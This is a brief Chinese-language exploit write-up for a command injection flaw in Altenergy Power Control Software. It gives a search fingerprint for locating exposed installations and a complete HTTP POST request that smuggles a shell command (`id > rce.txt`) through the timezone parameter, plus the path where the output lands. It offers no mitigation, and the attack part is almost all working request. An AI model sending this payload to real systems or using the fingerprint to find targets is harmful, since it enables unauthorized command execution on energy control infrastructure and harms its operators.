Altenergy电力系统控制软件存在命令执行漏洞
一、漏洞简介
Altenergy电力系统控制软件存在命令执行漏洞
二、影响版本
Altenergy
三、资产测绘
title="Altenergy Power Control Software"
四、漏洞复现
POST /index.php/management/set_timezone HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
timezone=`id > rce.txt`
/rce.txt